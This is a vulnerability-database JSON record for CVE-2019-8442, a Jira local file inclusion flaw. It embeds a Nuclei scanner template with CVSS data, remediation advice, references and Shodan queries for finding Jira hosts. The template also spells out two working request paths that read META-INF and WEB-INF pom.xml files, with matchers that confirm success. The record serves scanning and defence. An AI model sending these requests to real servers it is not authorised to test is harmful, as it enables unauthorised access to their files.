{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-8442/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-8442/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-8442/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-8442/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-8442/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-8442"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-8442"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2019/CVE-2019-8442.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2019-8442\n\ninfo:\n  name: Jira - Local File Inclusion\n  author: Kishore Krishna (siLLyDaddy)\n  severity: high\n  description: Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion.\n  impact: |\n    This vulnerability can result in sensitive information exposure, unauthorized access to files, and potential compromise of the Jira application.\n  remediation: |\n    Apply the latest security patches or updates provided by Atlassian to mitigate the vulnerability.\n  reference:\n    - https://jira.atlassian.com/browse/JRASERVER-69241\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-8442\n    - https://github.com/0ps/pocassistdb\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2019-8442\n    epss-score: 0.59832\n    epss-percentile: 0.99089\n    cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: atlassian\n    product: jira\n    shodan-query:\n      - http.component:\"Atlassian Jira\"\n      - http.component:\"atlassian jira\"\n      - http.component:\"atlassian confluence\"\n      - cpe:\"cpe:2.3:a:atlassian:jira\"\n  tags: cve,cve2019,atlassian,jira,lfi,intrusive,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml\"\n      - \"{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - <groupId>com.atlassian.jira</groupId>\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402205f085306818fdb8ce1b5c5c50e4677bf8f3dcf14b6f68efde3a734b54eec5084022076efecb6cdd8b64b0299e1b160641f647d2be3a38911ec8565f0911d9d38db33:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2019-8442"
}